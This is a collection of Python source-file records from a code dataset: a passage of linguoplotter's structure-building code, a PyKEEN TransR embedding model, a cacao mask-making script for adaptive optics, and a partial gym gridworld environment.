sub_chunks=self.new_set(),\n abstract_chunk=abstract_chunk,\n is_raw=is_raw,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n for existing_chunk in self.chunks:\n if not chunk.members.is_empty and all(\n member in existing_chunk.members for member in chunk.members\n ):\n chunk.super_chunks.add(existing_chunk)\n existing_chunk.sub_chunks.add(chunk)\n existing_chunk.recalculate_exigency()\n self.loggers[\"structure\"].log(existing_chunk)\n if not existing_chunk.members.is_empty and all(\n member in chunk.members for member in existing_chunk.members\n ):\n chunk.sub_chunks.add(existing_chunk)\n existing_chunk.super_chunks.add(chunk)\n existing_chunk.recalculate_exigency()\n self.loggers[\"structure\"].log(existing_chunk)\n if existing_chunk.is_raw and existing_chunk in chunk.members:\n existing_chunk.super_chunks.add(chunk)\n chunk.sub_chunks.add(existing_chunk)\n existing_chunk.recalculate_exigency()\n self.loggers[\"structure\"].log(existing_chunk)\n chunk._activation = activation\n self.add(chunk)\n return chunk\n\n def new_letter_chunk(\n self,\n name: Union[str, None],\n locations: List[Location],\n members: StructureSet = None,\n parent_space: Space = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n left_branch: StructureSet = None,\n right_branch: StructureSet = None,\n meaning_concept: Concept = None,\n grammar_concept: Concept = None,\n abstract_chunk: LetterChunk = None,\n ) -> LetterChunk:\n if left_branch is None:\n left_branch = self.new_set()\n if right_branch is None:\n right_branch = self.new_set()\n if members is None:\n members = StructureSet.union(left_branch, right_branch)\n parent_spaces = self.new_set(*[location.space for location in locations])\n letter_chunk = LetterChunk(\n structure_id=ID.new(LetterChunk),\n parent_id=parent_id,\n name=name,\n locations=locations,\n members=members,\n parent_space=parent_space,\n quality=quality,\n left_branch=left_branch,\n right_branch=right_branch,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n super_chunks=self.new_set(),\n sub_chunks=self.new_set(),\n abstract_chunk=abstract_chunk,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n for member in members:\n member.super_chunks.add(letter_chunk)\n member.recalculate_exigency()\n letter_chunk.sub_chunks.add(member)\n self.loggers[\"structure\"].log(member)\n self.add(letter_chunk)\n if meaning_concept is not None:\n self.new_relation(\n meaning_concept,\n letter_chunk,\n grammar_concept,\n quality=1.0,\n parent_id=parent_id,\n )\n if abstract_chunk is not None:\n abstract_chunk.instances.add(letter_chunk)\n return letter_chunk\n\n def new_concept(\n self,\n name: str,\n parent_id: str = \"\",\n locations: List[Location] = None,\n classifier: Classifier = None,\n instance_type: type = None,\n structure_type: type = None,\n parent_space: Space = None,\n distance_function: Callable = None,\n chunking_distance_function: Callable = None,\n possible_instances: StructureSet = None,\n subsumes: StructureSet = None,\n depth: int = 1,\n distance_to_proximity_weight: float = HyperParameters.DISTANCE_TO_PROXIMITY_WEIGHT,\n activation: FloatBetweenOneAndZero = None,\n is_slot: bool = False,\n reverse: Concept = None,\n ) -> Concept:\n locations = [] if locations is None else locations\n for location in locations:\n for sub_space in location.space.sub_spaces:\n if not any([l.space == sub_space for l in locations]):\n location_in_sub_space = (\n sub_space.location_from_super_space_location(location)\n )\n locations.append(location_in_sub_space)\n if parent_space is not None:\n if not any([location.space == parent_space for location in locations]):\n locations.append(\n Location(\n [[math.nan for _ in range(parent_space.no_of_dimensions)]],\n parent_space,\n )\n )\n parent_spaces = self.new_set(*[location.space for location in locations])\n possible_instances = (\n self.new_set() if possible_instances is None else possible_instances\n )\n subsumes = self.new_set() if subsumes is None else subsumes\n chunking_distance_function = (\n chunking_distance_function\n if chunking_distance_function is not None\n else distance_function\n )\n concept = Concept(\n structure_id=ID.new(Concept),\n parent_id=parent_id,\n name=name,\n locations=locations,\n classifier=classifier,\n instance_type=instance_type,\n structure_type=structure_type,\n parent_space=parent_space,\n child_spaces=self.new_set(),\n distance_function=distance_function,\n chunking_distance_function=chunking_distance_function,\n possible_instances=possible_instances,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n subsumes=subsumes,\n depth=depth,\n distance_to_proximity_weight=distance_to_proximity_weight,\n is_slot=is_slot,\n reverse=reverse,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n if activation is not None:\n concept._activation = activation\n self.add(concept)\n return concept\n\n def new_compound_concept(\n self,\n root: Concept,\n args: List[Concept],\n parent_id: str = \"\",\n is_slot: bool = False,\n reverse: Concept = None,\n subsumes: StructureSet = None,\n ):\n subsumes = self.new_set() if subsumes is None else subsumes\n try:\n return self.concepts.where(\n is_compound_concept=True, root=root, args=args\n ).get()\n except MissingStructureError:\n parent_spaces = self.new_set(\n *[location.space for location in args[0].locations]\n )\n concept = CompoundConcept(\n structure_id=ID.new(Concept),\n parent_id=parent_id,\n root=root,\n args=args,\n child_spaces=self.new_set(),\n possible_instances=self.new_set(),\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n subsumes=subsumes,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n is_slot=is_slot,\n reverse=reverse,\n )\n self.add(concept)\n self.new_relation(root, concept, quality=1.0, parent_id=parent_id)\n for arg in args:\n self.new_relation(arg, concept, quality=1.0, parent_id=parent_id)\n try:\n if all(\n arg.has_relation_with(\n self.concepts[\"more\"], parent_concept=self.concepts[\"more\"]\n )\n for arg in args\n ):\n self.new_relation(\n concept,\n self.concepts[\"more\"],\n self.concepts[\"more\"],\n quality=1.0,\n parent_id=parent_id,\n )\n elif all(\n arg.has_relation_with(\n self.concepts[\"less\"], parent_concept=self.concepts[\"more\"]\n )\n for arg in args\n ):\n self.new_relation(\n concept,\n self.concepts[\"less\"],\n self.concepts[\"more\"],\n quality=1.0,\n parent_id=parent_id,\n )\n except KeyError:\n pass\n return concept\n\n def new_correspondence(\n self,\n start: Structure,\n end: Structure,\n parent_concept: Concept,\n locations: List[Location] = None,\n conceptual_space: ConceptualSpace = None,\n parent_view: View = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n is_excitatory: bool = True,\n is_privileged: bool = False,\n is_projection: bool = False,\n ) -> Correspondence:\n if locations is None:\n if start.parent_space is not None and end.parent_space is not None:\n locations = [\n start.location_in_space(start.parent_space),\n end.location_in_space(end.parent_space),\n ]\n else:\n locations = []\n parent_spaces = self.new_set(*[location.space for location in locations])\n correspondence = Correspondence(\n structure_id=ID.new(Correspondence),\n parent_id=parent_id,\n start=start,\n end=end,\n arguments=self.new_set(start, end),\n locations=locations,\n parent_concept=parent_concept,\n conceptual_space=conceptual_space,\n parent_view=parent_view,\n quality=quality,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n is_excitatory=is_excitatory,\n is_privileged=is_privileged,\n is_projection=is_projection,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n start.links_out.add(correspondence)\n start.links_in.add(correspondence)\n start.recalculate_exigency()\n end.links_out.add(correspondence)\n end.links_in.add(correspondence)\n end.recalculate_exigency()\n self.add(correspondence)\n while parent_view is not None:\n parent_view.add(correspondence)\n parent_view.recalculate_exigency()\n self.loggers[\"structure\"].log(parent_view)\n try:\n parent_view = parent_view.super_views.get()\n except MissingStructureError:\n parent_view = None\n self.loggers[\"structure\"].log(start)\n self.loggers[\"structure\"].log(end)\n return correspondence\n\n def new_label(\n self,\n start: Structure,\n parent_concept: Concept,\n locations: List[Location],\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n parent_space: ContextualSpace = None,\n is_interspatial: bool = False,\n activation: FloatBetweenOneAndZero = None,\n ) -> Label:\n parent_space = start.parent_space if parent_space is None else parent_space\n parent_spaces = self.new_set(*[location.space for location in locations])\n label = Label(\n structure_id=ID.new(Label),\n parent_id=parent_id,\n start=start,\n arguments=self.new_set(start),\n parent_concept=parent_concept,\n locations=locations,\n quality=quality,\n parent_space=parent_space,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n is_interspatial=is_interspatial,\n )\n if activation is not None:\n label._activation = activation\n if start is not None:\n start.links_out.add(label)\n start.recalculate_exigency()\n self.loggers[\"structure\"].log(start)\n self.add(label)\n parent_concept.instances.add(label)\n return label\n\n def new_relation(\n self,\n start: Structure,\n end: Structure,\n parent_concept: Concept = None,\n locations: List[Location] = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n parent_space: ContextualSpace = None,\n conceptual_space: ConceptualSpace = None,\n is_bidirectional: bool = True,\n is_excitatory: bool = True,\n is_interspatial: bool = False,\n activation: FloatBetweenOneAndZero = None,\n stable_activation: FloatBetweenOneAndZero = None,\n ) -> Relation:\n parent_space = (\n start.parent_space\n if parent_space is None and start.parent_space == end.parent_space\n else parent_space\n )\n locations = [] if locations is None else locations\n parent_spaces = self.new_set(*[location.space for location in locations])\n relation = Relation(\n structure_id=ID.new(Relation),\n parent_id=parent_id,\n start=start,\n end=end,\n arguments=self.new_set(start, end),\n parent_concept=parent_concept,\n conceptual_space=conceptual_space,\n locations=locations,\n quality=quality,\n parent_space=parent_space,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n is_bidirectional=is_bidirectional,\n is_excitatory=is_excitatory,\n is_stable=stable_activation is not None,\n is_interspatial=is_interspatial,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n if activation is not None:\n relation._activation = activation\n if stable_activation is not None:\n relation._activation = stable_activation\n start.links_out.add(relation)\n end.links_in.add(relation)\n start.recalculate_exigency()\n end.recalculate_exigency()\n self.add(relation)\n if parent_concept is not None:\n if is_interspatial:\n try:\n parent_concept.relations.where(\n parent_concept=self.concepts[\"outer\"]\n ).get().end.instances.add(relation)\n except MissingStructureError:\n pass\n else:\n parent_concept.instances.add(relation)\n if None not in {parent_concept, conceptual_space}:\n try:\n concept_to_space_concept = (\n parent_concept.relations.where(\n parent_concept=conceptual_space.parent_concept\n )\n .get()\n .end\n )\n if is_interspatial:\n concept_to_space_concept.relations.where(\n parent_concept=self.concepts[\"outer\"]\n ).get().end.instances.add(relation)\n else:\n concept_to_space_concept.instances.add(relation)\n except MissingStructureError:\n pass\n self.loggers[\"structure\"].log(start)\n self.loggers[\"structure\"].log(end)\n return relation\n\n def new_view(self) -> View:\n raise NotImplementedError\n","repo_name":"georgeawright/linguoplotter","sub_path":"linguoplotter/bubble_chamber.py","file_name":"bubble_chamber.py","file_ext":"py","file_size_in_byte":32791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32968237649","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Implementation of TransR.\"\"\"\n\nfrom typing import Optional\n\nimport torch\nimport torch.autograd\nfrom torch import nn\nfrom torch.nn import functional\n\nfrom ..base import EntityRelationEmbeddingModel\nfrom ..init import embedding_xavier_uniform_\nfrom ...losses import Loss\nfrom ...regularizers import Regularizer\nfrom ...triples import TriplesFactory\nfrom ...utils import clamp_norm, get_embedding\n\n__all__ = [\n 'TransR',\n]\n\n\nclass TransR(EntityRelationEmbeddingModel):\n r\"\"\"An implementation of TransR from [lin2015]_.\n\n TransR is an extension of :class:`pykeen.models.TransH` that explicitly considers entities and relations as\n different objects and therefore represents them in different vector spaces.\n\n For a triple $(h,r,t) \\in \\mathbb{K}$, the entity embeddings, $\\textbf{e}_h, \\textbf{e}_t \\in \\mathbb{R}^d$,\n are first projected into the relation space by means of a relation-specific projection matrix\n $\\textbf{M}_{r} \\in \\mathbb{R}^{k \\times d}$. With relation embedding $\\textbf{r}_r \\in \\mathbb{R}^k$, the\n interaction model is defined similarly to TransE with:\n\n .. math::\n\n f(h,r,t) = -\\|\\textbf{M}_{r}\\textbf{e}_h + \\textbf{r}_r - \\textbf{M}_{r}\\textbf{e}_t\\|_{p}^2\n\n The following constraints are applied:\n\n * $\\|\\textbf{e}_h\\|_2 \\leq 1$\n * $\\|\\textbf{r}_r\\|_2 \\leq 1$\n * $\\|\\textbf{e}_t\\|_2 \\leq 1$\n * $\\|\\textbf{M}_{r}\\textbf{e}_h\\|_2 \\leq 1$\n * $\\|\\textbf{M}_{r}\\textbf{e}_t\\|_2 \\leq 1$\n\n .. seealso::\n\n - OpenKE `TensorFlow implementation of TransR\n `_\n - OpenKE `PyTorch implementation of TransR\n `_\n \"\"\"\n\n #: The default strategy for optimizing the model's hyper-parameters\n hpo_default = dict(\n embedding_dim=dict(type=int, low=20, high=300, q=50),\n relation_dim=dict(type=int, low=20, high=300, q=50),\n scoring_fct_norm=dict(type=int, low=1, high=2),\n )\n\n def __init__(\n self,\n triples_factory: TriplesFactory,\n embedding_dim: int = 50,\n automatic_memory_optimization: Optional[bool] = None,\n relation_dim: int = 30,\n scoring_fct_norm: int = 1,\n loss: Optional[Loss] = None,\n preferred_device: Optional[str] = None,\n random_seed: Optional[int] = None,\n regularizer: Optional[Regularizer] = None,\n ) -> None:\n \"\"\"Initialize the model.\"\"\"\n super().__init__(\n triples_factory=triples_factory,\n embedding_dim=embedding_dim,\n relation_dim=relation_dim,\n automatic_memory_optimization=automatic_memory_optimization,\n loss=loss,\n preferred_device=preferred_device,\n random_seed=random_seed,\n regularizer=regularizer,\n )\n self.scoring_fct_norm = scoring_fct_norm\n\n # embeddings\n self.relation_projections = get_embedding(\n num_embeddings=triples_factory.num_relations,\n embedding_dim=relation_dim * embedding_dim,\n device=self.device,\n )\n\n # Finalize initialization\n self.reset_parameters_()\n\n def post_parameter_update(self) -> None: # noqa: D102\n # Make sure to call super first\n super().post_parameter_update()\n\n # Normalize entity embeddings\n self.entity_embeddings.weight.data = clamp_norm(x=self.entity_embeddings.weight.data, maxnorm=1., p=2, dim=-1)\n self.relation_embeddings.weight.data = clamp_norm(\n x=self.relation_embeddings.weight.data,\n maxnorm=1.,\n p=2,\n dim=-1,\n )\n\n def _reset_parameters_(self): # noqa: D102\n # TODO: Initialize from TransE\n embedding_xavier_uniform_(self.entity_embeddings)\n embedding_xavier_uniform_(self.relation_embeddings)\n # Initialise relation embeddings to unit length\n functional.normalize(self.relation_embeddings.weight.data, out=self.relation_embeddings.weight.data)\n nn.init.xavier_uniform_(self.relation_projections.weight.view(\n self.num_relations, self.embedding_dim, self.relation_dim))\n\n @staticmethod\n def interaction_function(\n h: torch.FloatTensor,\n r: torch.FloatTensor,\n t: torch.FloatTensor,\n m_r: torch.FloatTensor,\n ) -> torch.FloatTensor:\n \"\"\"Evaluate the interaction function for given embeddings.\n\n The embeddings have to be in a broadcastable shape.\n\n :param h: shape: (batch_size, num_entities, d_e)\n Head embeddings.\n :param r: shape: (batch_size, num_entities, d_r)\n Relation embeddings.\n :param t: shape: (batch_size, num_entities, d_e)\n Tail embeddings.\n :param m_r: shape: (batch_size, num_entities, d_e, d_r)\n The relation specific linear transformations.\n\n :return: shape: (batch_size, num_entities)\n The scores.\n \"\"\"\n # project to relation specific subspace, shape: (b, e, d_r)\n h_bot = h @ m_r\n t_bot = t @ m_r\n # ensure constraints\n h_bot = clamp_norm(h_bot, p=2, dim=-1, maxnorm=1.)\n t_bot = clamp_norm(t_bot, p=2, dim=-1, maxnorm=1.)\n\n # evaluate score function, shape: (b, e)\n return -torch.norm(h_bot + r - t_bot, dim=-1) ** 2\n\n def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102\n # Get embeddings\n h = self.entity_embeddings(hrt_batch[:, 0]).unsqueeze(dim=1)\n r = self.relation_embeddings(hrt_batch[:, 1]).unsqueeze(dim=1)\n t = self.entity_embeddings(hrt_batch[:, 2]).unsqueeze(dim=1)\n m_r = self.relation_projections(hrt_batch[:, 1]).view(-1, self.embedding_dim, self.relation_dim)\n\n return self.interaction_function(h=h, r=r, t=t, m_r=m_r).view(-1, 1)\n\n def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102\n # Get embeddings\n h = self.entity_embeddings(hr_batch[:, 0]).unsqueeze(dim=1)\n r = self.relation_embeddings(hr_batch[:, 1]).unsqueeze(dim=1)\n t = self.entity_embeddings.weight.unsqueeze(dim=0)\n m_r = self.relation_projections(hr_batch[:, 1]).view(-1, self.embedding_dim, self.relation_dim)\n\n return self.interaction_function(h=h, r=r, t=t, m_r=m_r)\n\n def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102\n # Get embeddings\n h = self.entity_embeddings.weight.unsqueeze(dim=0)\n r = self.relation_embeddings(rt_batch[:, 0]).unsqueeze(dim=1)\n t = self.entity_embeddings(rt_batch[:, 1]).unsqueeze(dim=1)\n m_r = self.relation_projections(rt_batch[:, 0]).view(-1, self.embedding_dim, self.relation_dim)\n\n return self.interaction_function(h=h, r=r, t=t, m_r=m_r)\n","repo_name":"MindRank-Biotech/PharmKG","sub_path":"model/pykeen/pykeen/src/pykeen/models/unimodal/trans_r.py","file_name":"trans_r.py","file_ext":"py","file_size_in_byte":6880,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"47"} +{"seq_id":"19910383162","text":"from astropy.io import fits\n\nimport numpy as np\n\nimport logging\n\nfrom typing import Tuple\nfrom collections import namedtuple\n\nPercentileParam = namedtuple('PercentileParam', ['p0', 'c0', 'p1', 'c1'])\n\n\ndef make_masks_fitsio(\n file_in_resp: str, # conf/RMmodesWFS/zrespM-H.fits\n dm_perc: PercentileParam = PercentileParam(p0=0.2, c0=0.5, p1=0.5,\n c1=0.5),\n wfs_perc: PercentileParam = PercentileParam(p0=0.2, c0=0.5, p1=0.5,\n c1=0.5),\n *,\n dm_size: Tuple[int, int] = (50, 50)) -> None:\n '''\n Replacement of RMmkmask cacao bash script\n\n file_in_resp:\n Response obtained through measlinresp - decoded - corresponds to zrespM-H.fits\n\n dm_perc:\n PercentileParam - percentiles for DMmask truncation\n wfs_perc:\n PercentileParam - percentiles for WFSmask truncation\n\n '''\n\n resp_matrix = fits.getdata(file_in_resp)\n\n dm_n, wfs_size_i, wfs_size_j = resp_matrix.shape\n\n assert dm_n == dm_size[0] * dm_size[1]\n\n # Re-arrange into 4D tensor\n resp_4D = resp_matrix.reshape(*dm_size, wfs_size_i, wfs_size_j)\n\n dm_map, dm_mask, wfs_map, wfs_mask = make_masks(resp_4D, dm_perc, wfs_perc)\n\n fits.writeto('./conf/dmmap.fits', dm_map, overwrite=True)\n fits.writeto('./conf/dmmask.fits', dm_mask.astype(np.float32),\n overwrite=True)\n fits.writeto('./conf/wfsmap.fits', wfs_map, overwrite=True)\n fits.writeto('./conf/wfsmask.fits', wfs_mask.astype(np.float32),\n overwrite=True)\n\n\ndef make_masks(\n resp_4D: np.ndarray,\n dm_perc: PercentileParam,\n wfs_perc: PercentileParam,\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n '''\n\n '''\n\n # Dimension checks\n assert resp_4D.ndim == 4, \"resp_matrix not 4D\"\n\n dm_map = np.sum(resp_4D**2, axis=(2, 3))\n wfs_map = np.sum(resp_4D**2, axis=(0, 1))\n\n dm_mask = apply_percentile_masker(dm_map, dm_perc)\n wfs_mask = apply_percentile_masker(wfs_map, wfs_perc)\n\n return dm_map, dm_mask, wfs_map, wfs_mask\n\n\ndef apply_percentile_masker(map: np.ndarray, perc: PercentileParam):\n\n p0_val, p1_val = np.percentile(map, (perc.p0 * 100, perc.p1 * 100))\n\n return map > (p0_val * perc.c0 + p1_val * perc.c1)\n\n\nif __name__ == \"__main__\":\n\n pass\n","repo_name":"cacao-org/cacao","sub_path":"pycacao/calib/mkmasks.py","file_name":"mkmasks.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"47"} +{"seq_id":"24718370806","text":"from ast import literal_eval\nimport gym\nimport numpy as np\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\nfrom collections import defaultdict\nfrom itertools import chain, combinations\nfrom copy import deepcopy\n\nfrom enum import IntEnum\nfrom sympy.logic import boolalg\nfrom sympy import sympify, Symbol\n\nCOLOURS = {0: [1, 1, 1], 1: [0.0, 0.0, 0.0], 3: [0.9,0.9,0.9], 10: [0, 0, 1], 20:[1, 1, 0.0], 21:[0.8, 0.8, 0.8]}\n\n\n### Predicates base class\n\nclass GridWorld_Object():\n def __init__(self, positions=[], count=float('inf'), track=False):\n self.track = track\n self.positions = positions\n self._count = lambda: count if count else np.random.randint(3)\n \n self.achieved = False\n self.count = {position: self._count() for position in self.positions}\n\n def reset(self):\n self.count = {position: self._count() for position in self.positions}\n self.achieved = False\n return None\n \n def state(self, position):\n achieved = False\n if (position in self.count) and self.count[position]:\n self.count[position] -= 1\n achieved = True\n \n achieved = self.achieved or achieved\n if self.track:\n self.achieved = achieved\n \n state = []\n for position in self.positions:\n state.append(self.count[position]>0)\n \n return achieved, tuple(state)\n\n\n### Office world objects\n\nMAP = \"LT T T T RT LT T T T RT\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"L 0 0 0 0 0 0 0 0 R\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"LD D 0 D RD LD D 0 D RD\\n\" \\\n \"LT T 0 T RT LT T 0 T RT\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"L 0 0 0 0 0 0 0 0 R\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"LD D D D RD LD D D D RD\"\n\nclass roomA(GridWorld_Object):\n def __init__(self):\n positions = [(2,2)]\n super().__init__(positions)\n \nclass roomB(GridWorld_Object):\n def __init__(self):\n positions = [(2,7)]\n super().__init__(positions)\n \nclass roomC(GridWorld_Object):\n def __init__(self):\n positions = [(7,7)]\n super().__init__(positions)\n \nclass roomD(GridWorld_Object):\n def __init__(self):\n positions = [(7,2)]\n super().__init__(positions)\n\n# class door1(GridWorld_Object):\n# def __init__(self):\n# positions = [(7,2)]\n# super().__init__(positions)\n\n# class coffee(GridWorld_Object):\n# def __init__(self):\n# positions = [(3,5),(9,11)]\n# super().__init__(positions)\n\n# class mail(GridWorld_Object):\n# def __init__(self, count=0):\n# positions = [(6,10)]\n# super().__init__(positions, count)\n\n# class office(GridWorld_Object):\n# def __init__(self, count=0):\n# positions = [(6,6)]\n# super().__init__(positions, count)\n\n# class decor(GridWorld_Object):\n# def __init__(self, track=True):\n# # positions = [(6,2),(6,14),(2,6),(2,10),(10,6),(10,10),(2,2),(2,14),(10,14),(10,2)] # If room predicates are not used\n# positions = [(6,2),(6,14),(2,6),(2,10),(10,6),(10,10)]\n# super().__init__(positions, track=track)\n\ngridworld_objects = {\n '1room': roomA(),\n '2room': roomB(),\n '3room': roomC(),\n '4room': roomD(),\n # '10door': door1(),\n # '20door': door2(),\n # '30door': door3(),\n # '40door': door4(),\n # 'decor': decor(),\n # 'coffee': coffee(),\n # 'mail': mail(),\n # 'office': office(),\n}\n\n# Defining actions and directions\nclass Directions(IntEnum):\n # Move up, move right, move down, move left , done\n up = 0\n right = 1 \n down = 2\n left = 3\nclass PolarActions(IntEnum):\n # Move up, rotate right, rotate left, done\n up = 0\n right = 1\n left = 2\n done = 3 \n\n### GridWorld environment\n\nclass GridWorld(gym.Env):\n metadata = {'render.modes': ['human']}\n def __init__(self, MAP=MAP, gridworld_objects=gridworld_objects, goal_reward=10, step_reward=-0.1, start_position=None, start_direction=None, has_doors=True, slip_prob=0):\n\n self.n = None\n self.m = None\n\n self.grid = None\n self.hallwayStates = None\n self.possiblePositions = []\n self.walls = []\n \n self.MAP = MAP\n self._map_init()\n self.diameter = (self.n+self.m)-4\n self.directions = Directions\n self.actions = PolarActions\n\n self.done = False\n \n self.slip_prob = slip_prob\n \n self.gridworld_objects = gridworld_objects\n self.gridworld_objects_keys =tuple(sorted(list(self.gridworld_objects.keys())))\n\n self.start_position = start_position\n self.start_direction = start_direction\n self.position = self.start_position if start_position else self.possiblePositions[0]\n self.direction = self.start_direction if start_direction else self.directions.up\n self.step_count = 0\n \n object_states = []\n for i in self.gridworld_objects_keys:\n object_states.append(self.gridworld_objects[i].state(self.position))\n self.state = self.position,tuple(object_states)\n\n # Rewards\n self.goal_reward = goal_reward\n self.step_reward = step_reward\n self.rmax = goal_reward\n self.rmin = step_reward\n \n # Gym spaces for observation and action space\n self.observation_space = spaces.Discrete(len(self.possiblePositions))\n self.action_space = spaces.Discrete(len(self.actions))\n\n ##################### Goals\n self.GoalLocations = {}\n self.Doors = {}\n self.closed_doors = []\n \n self.has_doors = has_doors\n if self.has_doors:\n self.Doors[(2,4)] = \"n\"\n self.Doors[(2,5)] = \"n\"\n self.Doors[(7,4)] = \"s\"\n self.Doors[(7,5)] = \"s\"\n self.Doors[(4,2)] = \"w\"\n self.Doors[(5,2)] = \"w\"\n self.Doors[(4,7)] = \"e\"\n self.Doors[(5,7)] = \"e\"\n self.doors = set(list(self.Doors.values()))\n self.closed_doors = self.doors.copy()\n \n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n np.random.rand(seed)\n return [seed]\n \n def pertube_action(self,action): \n a = 1-self.slip_prob\n b = self.slip_prob/(self.action_space.n-2)\n if action == self.actions['UP']:\n probs = [a,b,b,b]\n elif action == self.actions['RIGHT']:\n probs = [b,a,b,b]\n elif action == self.actions['DOWN']:\n probs = [b,b,a,b]\n elif action == self.actions['LEFT']:\n probs = [b,b,b,a]\n action = np.random.choice(np.arange(len(probs)), p=probs) \n return action\n\n def step(self, action):\n assert self.action_space.contains(action)\n\n action = action #self.pertube_action(action)\n reward = self._get_reward(self.state, action)\n \n x, y = self.position \n cell = str(self._get_grid_value(self.position))\n if action == self.actions.up:\n wall = (self.direction==self.directions.up and 'T' in cell) or (self.direction==self.directions.right and 'R' in cell) or (self.direction==self.directions.down and 'D' in cell) or (self.direction==self.directions.left and 'L' in cell)\n if not wall:\n dirs = [0,-1],[1,0],[0,1],[-1,0]\n x = x + dirs[self.direction][1]\n y = y + dirs[self.direction][0]\n elif action == self.actions.right:\n self.direction = (self.direction+1)%len(self.directions)\n elif action == self.actions.left:\n self.direction = (self.direction+len(self.directions)-1)%len(self.directions)\n\n if self.position in self.Doors and (x,y) in self.Doors and self.position!=(x,y) and self.Doors[self.position] in self.closed_doors:\n self.closed_doors.remove(self.Doors[self.position])\n \n self.position = (x, y)\n \n object_states = []\n for i in self.gridworld_objects_keys:\n object_states.append(self.gridworld_objects[i].state(self.position))\n \n if self._get_grid_value(self.position) == 1: # new position in walls list\n # stay at old state if new coord is wall\n self.position = self.state[0]\n else:\n self.state = self.position, self.direction, frozenset(self.doors-self.closed_doors), tuple(object_states)\n \n return self.state, reward, self.done, None\n\n def _get_reward(self, state, action): \n return self.step_reward \n\n def reset(self):\n self.done = False\n self.closed_doors = self.doors.copy()\n \n if not self.start_position:\n idx = np.random.randint(len(self.possiblePositions))\n self.position = self.possiblePositions[idx] # self.start_state_coord\n else:\n self.position = self.start_position[np.random.randint(len(self.start_position))]\n \n self.direction = self.start_direction if self.start_direction != None else np.random.choice(self.directions)\n \n for p,f in self.gridworld_objects.items():\n f.reset()\n \n object_states = []\n for i in self.gridworld_objects_keys:\n object_states.append(self.gridworld_objects[i].state(self.position))\n self.state = (self.position,self.direction, frozenset(self.doors-self.closed_doors), tuple(object_states))\n return self.state\n\n def render(self, agent=True, env_map=False, goal=None, fig=None, mode='human', title=None, grid=False): \n img = self._gridmap_to_img(goal=goal) \n if not fig:\n fig = plt.figure(1, figsize=(12, 8), dpi=60, facecolor='w', edgecolor='k')\n \n params = {'font.size': 20}\n plt.rcParams.update(params)\n plt.clf()\n plt.xticks([])\n plt.yticks([])\n plt.grid(grid)\n if title:\n plt.title(title, fontsize=20)\n\n plt.imshow(img, origin=\"upper\", extent=[0, self.n, self.m, 0])\n fig.canvas.draw()\n\n if env_map:\n ax = fig.gca() \n for position in self.possiblePositions:\n y,x = position\n # Grid walls\n if (y,x) in self.Doors and self.Doors[(y,x)] in self.closed_doors:\n if (y,x+1) in self.Doors:\n self._draw_cell(ax, x, y, \"R\", color=\"#c2c2c2\")\n if (y,x-1) in self.Doors:\n self._draw_cell(ax, x, y, \"L\", color=\"#c2c2c2\")\n if (y+1,x) in self.Doors:\n self._draw_cell(ax, x, y, \"D\", color=\"#c2c2c2\")\n if (y-1,x) in self.Doors:\n self._draw_cell(ax, x, y, \"T\", color=\"#c2c2c2\")\n continue\n cell = self.grid[y][x]\n if cell == 0 or cell == 1:\n continue\n self._draw_cell(ax, x, y, cell)\n \n # Grid objects\n for gridworld_object, function in self.gridworld_objects.items():\n if position in function.positions and function.count[position]>0:\n p = gridworld_object[0].upper()\n c = function.count[position]\n c = '' if c == float('inf') else str(c)\n label = \"{}{}\".format(c,p)\n \n ax.text(x+0.25, y+0.65, label, style='oblique', size=fig.get_figheight()*2)\n break\n\n if agent:\n for (x,y) in self.GoalLocations.keys():\n self._draw_action(ax, x, y, self.actions.done, color=\"#c2c2c2\")\n y, x = self.position\n self._draw_agent(ax, x, y, self.direction)\n \n if mode == 'rgb_array':\n width, height = fig.get_size_inches() * fig.get_dpi()\n img = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n img = img.reshape(int(width), int(height), 3)\n return img\n \n return fig\n\n def _map_init(self):\n self.grid = []\n lines = self.MAP.split('\\n')\n\n for i, row in enumerate(lines):\n row = row.split(' ')\n if self.n is not None and len(row) != self.n:\n raise ValueError(\n \"Map's rows are not of the same dimension...\")\n self.n = len(row)\n rowArray = []\n for j, col in enumerate(row):\n if col in \"01\":\n rowArray.append(int(col))\n 